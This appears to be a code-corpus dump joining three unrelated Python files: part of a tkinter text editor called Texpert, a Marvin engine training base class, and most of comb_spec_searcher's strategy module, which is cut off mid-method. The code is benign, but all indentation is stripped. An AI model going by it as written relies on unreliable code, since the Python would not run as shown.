CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.\n\n""")
lic.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('480x450+550+230')
win.wait_window()
def trouble_com(event=None):
win = tk.Toplevel()
win.title("Troubleshooting")
trouble = tk.Label(win, justify='left', text="""\n\n
This program was designed for Linux and
may not work on other operating systems
(i.e., rendering and/or functionality issues).\n
Texpert text editor is a work in progress
and may or may not ever be completed.\n\n
Known Issues:\n
Line/Col numbers are not fully functional.
Problem remains: unfixed.\n
Print preview is not entirely accurate.\n
Also, (pay attention because this is important)
anything typed in note area will not be saved
as it was not designed/programmed to do so.
\n\nAnyway..\n""")
trouble.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('354x408+612+230')
win.wait_window()
def shortcut_keys(event=None):
win = tk.Toplevel()
win.title("Shortcut Keys")
shortk = tk.Label(win, justify='left',
text="""\n
List of shortcut keys and their functions.\n\n
Menu \tKeys\t\tFunctions\n
File:\tCtrl+N \t\tNew File
\tCtrl+O \t\tOpen File
\tCtrl+S \t\tSave File
\tCtrl+Shift+S\tSave As
\tCtrl+W \t\tClose File
\tCtrl+Q \t\tQuit Program (exit)\n\n
Edit:\tCtrl+Z \t\tUndo
\tCtrl+Shift+Z\tRedo
\tCtrl+X \t\tCut
\tCtrl+C \t\tCopy
\tCtrl+V \t\tPaste
\tCtrl+A \t\tSelect All\n\n
View:\tCtrl+D \t\tDefault Win Size
\tF11 \t\tFullscreen
\tEscape \t\tExit Fullscreen
\n\n""")
shortk.pack()
cls = tk.Button(win, text="Close", command=win.destroy)
cls.pack()
win.transient(root)
win.geometry('380x460+600+230')
win.wait_window()
#context menu (right-click)
def r_click(event):
editmenu.tk_popup(event.x_root, event.y_root)
texpert.bind("<Button-3>", r_click)
#line count (statusbar)
def linecount(event):
(line, char) = map(int, event.widget.index("end-1c").split("."))
line_lbl['text'] = 'Line {line}, Col {col}'.format(line=line, col=char + 1)
texpert.bind("<KeyRelease>", linecount)
#Main Menu
menu = tk.Menu(root, bd=1, relief='flat')
root.config(menu=menu, bd=2)
#File
filemenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="File ", menu=filemenu)
filemenu.add_command(label="New",
command=new_com,
accelerator="Ctrl+N".rjust(15))
filemenu.add_command(label="Open",
command=open_com,
accelerator="Ctrl+O".rjust(15))
filemenu.add_separator()
filemenu.add_command(label="Save",
command=save_com,
accelerator="Ctrl+S".rjust(15))
filemenu.add_command(label="Save As",
command=saveas_com,
accelerator="Ctrl+Shift+S")
filemenu.add_separator()
filemenu.add_command(label="Print",
command=print_com, state="disabled")
filemenu.add_command(label="Print Preview",
command=preview_com)
filemenu.add_separator()
filemenu.add_command(label="Close",
command=close_com,
accelerator="Ctrl+W".rjust(15))
filemenu.add_command(label="Exit",
command=exit_com, underline=1,
accelerator="Ctrl+Q".rjust(15))
#Edit
editmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Edit ", menu=editmenu)
editmenu.add_command(label="Undo",
command=undo_com,
accelerator="Ctrl+Z".rjust(15))
editmenu.add_command(label="Redo",
command=redo_com,
accelerator="Ctrl+Shift+Z")
editmenu.add_separator()
editmenu.add_command(label="Cut",
command=cut_com,
accelerator="Ctrl+X".rjust(15))
editmenu.add_command(label="Copy",
command=copy_com,
accelerator="Ctrl+C".rjust(15))
editmenu.add_command(label="Paste",
command=paste_com,
accelerator="Ctrl+V".rjust(15))
editmenu.add_separator()
editmenu.add_command(label="Select All",
command=select_all,
accelerator="Ctrl+A".rjust(15))
#View
viewmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="View ", menu=viewmenu)
is_toolbar = tk.BooleanVar()
is_toolbar.trace('w', lambda *args: tool_bar())
viewmenu.add_checkbutton(label="Toolbar",
variable=is_toolbar,
onvalue=0,
offvalue=1)
is_statusbar = tk.BooleanVar()
is_statusbar.trace('w', lambda *args: status_bar())
viewmenu.add_checkbutton(label="Statusbar",
variable=is_statusbar,
onvalue=0,
offvalue=1)
viewmenu.add_separator()
#sub-menu buttons for: [view > mode]
submenu = tk.Menu(menu, tearoff=0)
viewmenu.add_cascade(label="Mode ", menu=submenu)
submenu.add_command(label=" Dark ",
command=dark_mode,
activebackground=darkbg,
activeforeground=darkfg)
submenu.add_command(label=" Light ",
command=light_mode,
activebackground=lightbg,
activeforeground=lightfg)
submenu.add_command(label=" Legal ",
command=legal_mode,
activebackground=legalbg,
activeforeground=legalfg)
submenu.add_command(label=" Night ",
command=night_mode,
activebackground=nightbg,
activeforeground=nightfg)
is_transparent = tk.BooleanVar()
is_transparent.trace('w', lambda *args: transparent())
viewmenu.add_checkbutton(label="Transparency",
variable=is_transparent,
onvalue=1,
offvalue=0)
is_blockcursor = tk.BooleanVar()
is_blockcursor.trace('w', lambda *args: blockcursor())
viewmenu.add_checkbutton(label="Block Cursor",
variable=is_blockcursor,
onvalue=1,
offvalue=0)
viewmenu.add_separator()
viewmenu.add_command(label="Hide in Tray", command=tray_com)
viewmenu.add_separator()
viewmenu.add_command(label="Vertical", command=vertical_view)
viewmenu.add_command(label="Default", command=default_view,
accelerator="Ctrl+D")
viewmenu.add_command(label="Fullscreen", command=full_screen,
accelerator="F11".rjust(8))
#Tools
toolmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Tools ", menu=toolmenu)
toolmenu.add_command(label="Insert Time", command=time_com)
toolmenu.add_command(label="Insert Date", command=date_com)
toolmenu.add_command(label="Insert Path/File", command=fname)
is_notearea = tk.BooleanVar()
is_notearea.trace('w', lambda *args: note_area())
toolmenu.add_checkbutton(label="Note Area", variable=is_notearea)
#Help
helpmenu = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Help ", menu=helpmenu)
helpmenu.add_command(label="About", command=about_com)
helpmenu.add_command(label="Troubleshooting", command=trouble_com)
helpmenu.add_command(label="Shortcut Keys", command=shortcut_keys)
#ToolBar (main)
toolbar = tk.Frame(mainframe, bd=2, relief='groove')
toolbar.pack(side='top', anchor='n', fill='x')
b1 = tk.Button(toolbar, text="Open", width=5, command=open_com)
b1.pack(side='left', padx=4, pady=2)
b2 = tk.Button(toolbar, text="Save", width=5, command=save_com)
b2.pack(side='right', padx=4, pady=2)
b4 = tk.Button(toolbar, text="Notes", width=5,
command=lambda: is_notearea.set(not is_notearea.get()))
b4.pack(side='right', padx=4, pady=2)
#ToolBar 'Mode' button
var = tk.StringVar(toolbar)
var.set("Mode")
w = tk.OptionMenu(toolbar, variable=var, value='')
w.config(indicatoron=0, bd=1, width=7, padx=4, pady=5)
w.pack(side='left', padx=4, pady=2)
first = tk.BooleanVar()
second = tk.BooleanVar()
third = tk.BooleanVar()
fourth = tk.BooleanVar()
w['menu'].delete('0', 'end')
w['menu'].add_checkbutton(label=" Dark ", onvalue=1, offvalue=0,
activebackground=darkbg,
activeforeground=darkfg,
variable=first,
command=dark_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Light ", onvalue=1, offvalue=0,
activebackground=lightbg,
activeforeground=lightfg,
variable=second,
command=light_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Legal ", onvalue=1, offvalue=0,
activebackground=legalbg,
activeforeground=legalfg,
variable=third,
command=legal_mode,
indicatoron=0)
w['menu'].add_checkbutton(label=" Night ", onvalue=1, offvalue=0,
activebackground=nightbg,
activeforeground=nightfg,
variable=fourth,
command=night_mode,
indicatoron=0)
#Toolbar2 (for print preview)
toolbar2 = tk.Frame(mainframe, bd=2, relief='groove')
b2 = tk.Button(toolbar2, text="Close Preview", width=10, command=default_view)
b2.pack(side='right', padx=28, pady=4)
#Toolbar2 'Zoom' button
var = tk.StringVar()
var.set("Zoom Level")
w2 = tk.OptionMenu(toolbar2, variable=var, value='')
w2.config(indicatoron=0, bd=1, width=12, padx=4, pady=5)
w2.pack(side='left', padx=28, pady=4)
one = tk.BooleanVar()
two = tk.BooleanVar()
three = tk.BooleanVar()
four = tk.BooleanVar()
five = tk.BooleanVar()
w2['menu'].delete('0', 'end')
w2['menu'].add_radiobutton(label=" 60% ".rjust(6), variable="", value=1, command=nine_font)
w2['menu'].add_radiobutton(label=" 75% ".rjust(6), variable="", value=2, command=tenn_font)
w2['menu'].add_radiobutton(label="100% ", variable="", value=3, command=levn_font)
w2['menu'].add_radiobutton(label="125% ", variable="", value=4, command=twev_font)
w2['menu'].add_radiobutton(label="150% ", variable="", value=5, command=fort_font)
#Init Note Area
note_frame = tk.Frame(texpert, bd=0, relief='sunken')
tex = tk.Text(note_frame, width=18, undo=True)
tex.pack(side='top', fill='both', expand=True)
tex.config(padx=2, pady=2, wrap="word", bg=lightbg, fg=lightfg)
tex.insert('1.0', "Notes are not saved..")
clear = tk.Button(note_frame, text="Clear", width=4,
command=lambda: tex.delete('1.0', 'end-1c'))
clear.pack(side='left', padx=2, pady=2)
close = tk.Button(note_frame, text="Close", width=4,
command=lambda: is_notearea.set(not is_notearea.get()))
close.pack(side='right', padx=2, pady=2)
#bindings
root.bind_all('<Control-a>', select_all)
root.bind_all('<Control-n>', new_com)
root.bind_all('<Control-o>', open_com)
root.bind_all('<Control-s>', save_com)
root.bind_all("<Control-Shift-S>", saveas_com)
root.bind_all('<Control-w>', close_com)
root.bind_all('<Control-q>', exit_com)
root.bind_all('<Control-d>', default_view)
root.bind_all('<F11>', full_screen)
root.bind("<Escape>", lambda event: root.attributes("-zoomed", False))
root.protocol("WM_DELETE_WINDOW", exit_com)
root.mainloop()
|
py | 7df7d9fba13aa745bbfaa1021234482a1f5a0f59 | #!/usr/bin/env python
# coding=utf-8
# Copyright [2017] [B2W Digital]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta
from .._compatibility import six
from .._logging import get_logger
from .engine_base_action import EngineBaseBatchAction
__all__ = ['EngineBaseTraining']
logger = get_logger('engine_base_training')
class EngineBaseTraining(EngineBaseBatchAction):
__metaclass__ = ABCMeta
_dataset = None
_model = None
_metrics = None
def __init__(self, **kwargs):
self._dataset = self._get_arg(kwargs=kwargs, arg='dataset')
self._model = self._get_arg(kwargs=kwargs, arg='model')
self._metrics = self._get_arg(kwargs=kwargs, arg='metrics')
super(EngineBaseTraining, self).__init__(**kwargs)
@property
def marvin_dataset(self):
return self._load_obj(object_reference='_dataset')
@marvin_dataset.setter
def marvin_dataset(self, dataset):
self._save_obj(object_reference='_dataset', obj=dataset)
@property
def marvin_model(self):
return self._load_obj(object_reference='_model')
@marvin_model.setter
def marvin_model(self, model):
self._save_obj(object_reference='_model', obj=model)
@property
def marvin_metrics(self):
return self._load_obj(object_reference='_metrics')
@marvin_metrics.setter
def marvin_metrics(self, metrics):
self._save_obj(object_reference='_metrics', obj=metrics)
|
py | 7df7da0536da9f32f268550187d393f9a1651cd8 | """
The Strategy class is essentially following the mantra of 'strategy' from the
combinatorial explanation paper.
(https://permutatriangle.github.io/papers/2019-02-27-combex.html)
In order to use CombinatorialSpecificationSearcher, you must implement a
Strategy. The functions required are:
- decomposition_function: Given a combinatorial class, the decomposition
function should return the tuple of
combinatorial classes it can be counted by. The
function should return None if it doesn't
apply.
- constructor: Return a Constructor class. If you wish to use
CartesianProduct or DisjointUnion, consider
using the CartesianProductStrategy or
DisjointUnionStrategy subclasses.
- formal_step: A short string explaining what was done.
- backward_map: This is the backward mapping of the underlying
bijection of the strategy. If you want to
generate objects, or sample you must implement
this. You can instead raise NotImplementedError
if you don't wish to use these features.
- forward_map: This is the forward mapping of the underlying
bijection. See the discussion for forward map.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
Also included in this file is a StrategyFactory class. This is useful if you
are defining a family of strategies. When the __call__ method is applied to it,
it should return an iterator of Strategy to try and apply to the comb_class.
For a VerificationStrategy you must implement the methods:
- verified: Return True if the combinatorial class is
verified by the strategy.
- pack The pack is used to count and generate the
objects. If the strategy doesn't have a CSS
strategy pack that can be used to enumerate
verified combinatorial classes, then you need
to implement the methods count_objects_of_size,
generate_objects_of_size, and get_genf.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
If your verification strategy is for the atoms, consider using the
AtomStrategy, relying on CombinatorialClass methods.
"""
import abc
from importlib import import_module
from typing import (
TYPE_CHECKING,
Dict,
Generic,
Iterator,
Optional,
Tuple,
Type,
Union,
cast,
)
from sympy import Expr, Function, Integer, var
from ..combinatorial_class import (
CombinatorialClass,
CombinatorialClassType,
CombinatorialObject,
CombinatorialObjectType,
)
from ..exception import InvalidOperationError, ObjectMappingError, StrategyDoesNotApply
from .constructor import CartesianProduct, Constructor, DisjointUnion
from .rule import AbstractRule, Rule, VerificationRule
if TYPE_CHECKING:
from .strategy_pack import StrategyPack
from comb_spec_searcher import CombinatorialSpecification
__all__ = (
"AbstractStrategy",
"CartesianProductStrategy",
"DisjointUnionStrategy",
"Strategy",
"StrategyFactory",
"SymmetryStrategy",
"VerificationStrategy",
)
CSSstrategy = Union["Strategy", "StrategyFactory", "VerificationStrategy"]
def strategy_from_dict(d) -> CSSstrategy:
"""
Return the AbstractStrategy or StrategyFactory from the json representation.
"""
module = import_module(d.pop("class_module"))
StratClass: Type[CSSstrategy] = getattr(module, d.pop("strategy_class"))
assert issubclass(
StratClass, (AbstractStrategy, StrategyFactory)
), "Not a valid strategy"
return StratClass.from_dict(d)
class AbstractStrategy(
abc.ABC, Generic[CombinatorialClassType, CombinatorialObjectType]
):
"""
A base class for strategies for methods that Strategy and
VerificationStrategy have in common.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
self._ignore_parent = ignore_parent
self._inferrable = inferrable
self._possibly_empty = possibly_empty
self._workable = workable
@abc.abstractmethod
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> AbstractRule[CombinatorialClassType, CombinatorialObjectType]:
"""
Return the rule formed by using the strategy.
"""
@property
def ignore_parent(self) -> bool:
"""
Return True if it is not worth expanding the parent/comb_class if
the strategy applies.
"""
return self._ignore_parent
@property
def inferrable(self) -> bool:
"""
Return True if the children could change using inferral strategies.
"""
return self._inferrable
@property
def possibly_empty(self) -> bool:
"""
Return True if it is possible that a child is empty.
"""
return self._possibly_empty
@property
def workable(self) -> bool:
"""
Return True if the children can expanded using other strategies.
"""
return self._workable
@abc.abstractmethod
def can_be_equivalent(self) -> bool:
"""
Return True if every Rule returned with one non-empty child is an
equivalence rule.
"""
@abc.abstractmethod
def decomposition_function(
self, comb_class: CombinatorialClassType
) -> Optional[Tuple[CombinatorialClassType, ...]]:
"""
Return the children of the strategy for the given comb_class. It
should return None if it does not apply.
"""
@abc.abstractmethod
def formal_step(self) -> str:
"""
Return a short string to explain what the strategy has done.
"""
@staticmethod
def get_eq_symbol() -> str:
"""
Return a choice for '=' in the pretty print a '=' b '+' c of rules.
Your choice should be a single charachter.
"""
return "="
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
Your choice should be a single charachter.
"""
return "+"
def __eq__(self, other: object) -> bool:
if not isinstance(other, AbstractStrategy):
return NotImplemented
return self.__class__ == other.__class__ and self.__dict__ == other.__dict__
def __repr__(self):
return (
self.__class__.__name__
+ f"(ignore_parent={self.ignore_parent}, inferrable={self.inferrable},"
f" possibly_empty={self.possibly_empty}, workable={self.workable})"
)
def __str__(self) -> str:
return self.formal_step()
def to_jsonable(self) -> dict:
"""
Return a dictionary form of the strategy.
"""
c = self.__class__
return {
"class_module": c.__module__,
"strategy_class": c.__name__,
"ignore_parent": self._ignore_parent,
"inferrable": self._inferrable,
"possibly_empty": self._possibly_empty,
"workable": self._workable,
}
@classmethod
@abc.abstractmethod
def from_dict(cls, d: dict) -> CSSstrategy:
return strategy_from_dict(d)
class Strategy(AbstractStrategy[CombinatorialClassType, CombinatorialObjectType]):
"""
The Strategy class is essentially following the mantra of 'strategy' from the
combinatorial explanation paper.
(https://permutatriangle.github.io/papers/2019-02-27-combex.html)
In order to use CombinatorialSpecificationSearcher, you must implement a
Strategy. The functions required are:
- decomposition_function: Given a combinatorial class, the decomposition
function should return the tuple of
combinatorial classes it can be counted by. The
function should return None if it doesn't
apply.
- constructor: Return a Constructor class. If you wish to use
CartesianProduct or DisjointUnion, consider
using the CartesianProductStrategy or
DisjointUnionStrategy subclasses.
- formal_step: A short string explaining what was done.
- backward_map: This is the backward mapping of the underlying
bijection of the strategy. If you want to
generate objects, or sample you must implement
this. You can instead raise NotImplementedError
if you don't wish to use these features.
- forward_map: This is the forward mapping of the underlying
bijection. See the discussion for forward map.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> Rule[CombinatorialClassType, CombinatorialObjectType]:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return Rule(self, comb_class, children=children)
@abc.abstractmethod
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Constructor:
"""
This is where the details of the 'reliance profile' and 'counting'
functions are hidden.
"""
if children is None:
children = self.decomposition_function(comb_class)
@abc.abstractmethod
def backward_map(
self,
comb_class: CombinatorialClassType,
objs: Tuple[Optional[CombinatorialObjectType], ...],
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> CombinatorialObjectType:
"""
The forward direction of the underlying bijection used for object
generation and sampling.
"""
if children is None:
children = self.decomposition_function(comb_class)
@abc.abstractmethod
def forward_map(
self,
comb_class: CombinatorialClassType,
obj: CombinatorialObjectType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Tuple[Optional[CombinatorialObjectType], ...]:
"""
The backward direction of the underlying bijection used for object
generation and sampling.
"""
if children is None:
children = self.decomposition_function(comb_class)
def extra_parameters(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Tuple[Dict[str, str], ...]:
"""
This should be a tuple of dictionaries where the parent parameters point
to the corresponding child parameter. Any parent parameter not
corresponding to a child parameter must have no objects that are on
that child.
"""
assert not comb_class.extra_parameters, (
"you need to update the 'extra_parameters' method in the strategy {} "
"in order to enumerate class with multiple extra_parameters".format(
str(self)
)
)
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return tuple(dict() for _ in children)
class CartesianProductStrategy(
Strategy[CombinatorialClassType, CombinatorialObjectType]
):
"""
The CartesianProductStrategy is a subclass of strategy. The constructor is
CartesianProduct. Such strategies by default assume
ignore_parent=True, inferrable=False, possibly_empty=False, and
workable=True.
The bijection maps an object a -> (b1, ..., bk) where bi is the object in
the child at index i returned by the decomposition function.
"""
def __init__(
self,
ignore_parent: bool = True,
inferrable: bool = False,
possibly_empty: bool = False,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
@staticmethod
def can_be_equivalent() -> bool:
return True
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Constructor:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return CartesianProduct(
comb_class,
children,
extra_parameters=self.extra_parameters(comb_class, children),
)
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
Your choice should be a single charachter.
"""
return "x"
class DisjointUnionStrategy(Strategy[CombinatorialClassType, CombinatorialObjectType]):
"""
The DisjointUnionStrategy is a subclass of Strategy. The constructor used
is DisjointUnion.
The bijection maps an object a -> (None, ..., b, ..., None) where b is at
the index of the child it belongs to.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
@staticmethod
def can_be_equivalent() -> bool:
return True
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> DisjointUnion:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return DisjointUnion(
comb_class,
children,
extra_parameters=self.extra_parameters(comb_class, children),
)
@staticmethod
def backward_map_index(objs: Tuple[Optional[CombinatorialObjectType], ...]) -> int:
"""
Return the index of the comb_class that the sub_object returned.
"""
for idx, obj in enumerate(objs):
if obj is not None:
return idx
raise ObjectMappingError(
"For a disjoint union strategy, an object O is mapped to the tuple"
"with entries being None, except at the index of the child which "
"contains O, where it should be O."
)
def backward_map(
self,
comb_class: CombinatorialClassType,
objs: Tuple[Optional[CombinatorialObjectType], ...],
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> CombinatorialObjectType:
"""
This method will enable us to generate objects, and sample.
If it is a direct bijection, the below implementation will work!
"""
if children is None:
children = self.decomposition_function(comb_class)
idx = DisjointUnionStrategy.backward_map_index(objs)
return cast(CombinatorialObjectType, objs[idx])
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
Your choice should be a single charachter.
"""
return "+"
class SymmetryStrategy(
DisjointUnionStrategy[CombinatorialClassType, CombinatorialObjectType]
):
"""General representation for a symmetry strategy."""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = False,
possibly_empty: bool = False,
workable: bool = False,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
class VerificationStrategy(
AbstractStrategy[CombinatorialClassType, CombinatorialObjectType]
):
"""
For a VerificationStrategy you must implement the methods:
- verified: Return True if the combinatorial class is
verified by the strategy.
- pack The pack is used to count and generate the
objects. If the strategy doesn't have a CSS
strategy pack that can be used to enumerate
verified combinatorial classes, then you need
to implement the methods count_objects_of_size,
generate_objects_of_size, and get_genf.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
If your verification strategy is for the atoms, consider using the
AtomStrategy, relying on CombinatorialClass methods.
"""
def __init__(
self, ignore_parent: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=False,
possibly_empty=False,
workable=False,
)
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> VerificationRule[CombinatorialClassType, CombinatorialObjectType]:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("The combinatorial class is not verified")
return VerificationRule(self, comb_class, children)
@staticmethod
def can_be_equivalent() -> bool:
return False
def pack(self, comb_class: CombinatorialClassType) -> "StrategyPack":
"""
Returns a StrategyPack that finds a proof tree for the comb_class in
which the verification strategies used are "simpler".
The pack is assumed to produce a finite universe.
"""
raise InvalidOperationError(f"can't find specification for {self}")
@abc.abstractmethod
def verified(self, comb_class: CombinatorialClassType) -> bool:
"""
Returns True if enumeration strategy works for the combinatorial class.
"""
def get_specification(
self, comb_class: CombinatorialClassType
) -> "CombinatorialSpecification[CombinatorialClassType, CombinatorialObjectType]":
"""
Returns a combinatorial specification for the combinatorial class.
Raises an `StrategyDoesNotApply` if no specification can be found,
e.g. if it is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
# pylint: disable=import-outside-toplevel
from ..comb_spec_searcher import CombinatorialSpecificationSearcher
searcher = CombinatorialSpecificationSearcher(comb_class, self.pack(comb_class))
specification = searcher.auto_search()
assert specification is not None, StrategyDoesNotApply(
"Cannot find a specification"
)
return specification
def get_genf(
self,
comb_class: CombinatorialClassType,
funcs: Optional[Dict[CombinatorialClassType, Function]] = None,
) -> Expr:
"""
Returns the generating function for the combinatorial class.
Raises an StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return self.get_specification(comb_class).get_genf()
def decomposition_function(
self, comb_class: CombinatorialClassType
) -> Union[Tuple[CombinatorialClassType, ...], None]:
"""
A combinatorial class C is marked as verified by returning a rule
C -> (). This ensures that C is in a combinatorial specification as it
appears exactly once on the left hand side.
The function returns None if the verification strategy doesn't apply.
"""
if self.verified(comb_class):
return tuple()
return None
def count_objects_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> int:
"""
A method to count the objects.
Raises an StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return int(
self.get_specification(comb_class).count_objects_of_size(n, **parameters)
)
def generate_objects_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> Iterator[CombinatorialObjectType]:
"""
A method to generate the objects.
Raises an StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
yield from self.get_specification(comb_class).generate_objects_of_size(
n, **parameters
)
def random_sample_object_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> CombinatorialObjectType:
"""
A method to sample uniformly at random from a verified combinatorial class.
Raises an StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return self.get_specification(comb_class).random_sample_object_of_size(
n, **parameters
)
def to_jsonable(self) -> dict:
d = super().to_jsonable()
d.pop("inferrable")
d.pop("possibly_empty")
d.pop("workable")
return d
class AtomStrategy(VerificationStrategy[CombinatorialClass, CombinatorialObject]):
"""
A subclass for when a combinatorial class is an atom - meaning consisting
of a single object.
"""
def __init__(self):
super().__init__(ignore_parent=True)
@staticmethod
def count_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> int:
"""
Verification strategies must contain a method to count the objects.
"""
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
return 1
return 0
def get_genf(
self,
comb_class: CombinatorialClass,
funcs: Optional[Dict[CombinatorialClass, Function]] = None,
) -> Expr:
if comb_class.extra_parameters:
raise NotImplementedError
if not self.verified(comb_class):
raise StrategyDoesNotApply("Can't find generating functon for non-atom.")
x = var("x")
return x ** comb_class.minimum_size_of_object()
@staticmethod
def generate_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> Iterator[CombinatorialObject]:
"""
Verification strategies must contain a method to generate the objects.
"""
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
yield from comb_class.objects_of_size(n)
@staticmethod
def random_sample_object_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> CombinatorialObject:
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
obj: CombinatorialObject = next(comb_class.objects_of_size(n))
return obj
@staticmethod
def verified(comb_class: CombinatorialClass) -> bool:
return bool(comb_class.is_atom())
@staticmethod
def formal_step() -> str:
return "is atom"
@staticmethod
def pack(comb_class: CombinatorialClass) -> "StrategyPack":
raise InvalidOperationError("No pack for the empty strategy.")
def to_jsonable(self) -> dict:
d: dict = super().to_jsonable()
d.pop("ignore_parent")
return d
@classmethod
def from_dict(cls, d: dict) -> "AtomStrategy":
assert not d
return cls()
def __repr__(self) -> str:
return self.__class__.__name__ + f"(ignore_parent={self.ignore_parent})"
def __str__(self) -> str:
return "verify atoms"
class EmptyStrategy(VerificationStrategy[CombinatorialClass, CombinatorialObject]):
"""
A subclass for when a combinatorial class is equal to the empty set.
"""
def __init__(self):
super().__init__(ignore_parent=True)
@staticmethod
def count_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> int:
"""
Verification strategies must contain a method to count the objects.
"""
return 0
def get_genf(
self,
comb_class: CombinatorialClass,
funcs: Optional[Dict[CombinatorialClass, Function]] = None,
) -> Integer:
if not self.verified(comb_class):
raise StrategyDoesNotApply(
"can't find generating functon for non-empty class."
)
return Integer(0)
@staticmethod
def generate_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> Iterator[CombinatorialObject]:
"""
Verification strategies must contain a method to generate the objects.
"""
return iter([])
@staticmethod
def random_sample_object_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> CombinatorialObject:
raise StrategyDoesNotApply("Can't sample from empty set.")
@staticmethod
def verified(comb_class: CombinatorialClass) -> bool:
return bool(comb_class.is_empty())
@staticmethod
def formal_step() -> str:
return "is empty"
@staticmethod
def pack(comb_class: CombinatorialClass) -> "StrategyPack":
raise InvalidOperationError("No pack for the empty strategy.")
def to_jsonable(self) -> dict:
d: dict = super().to_jsonable()
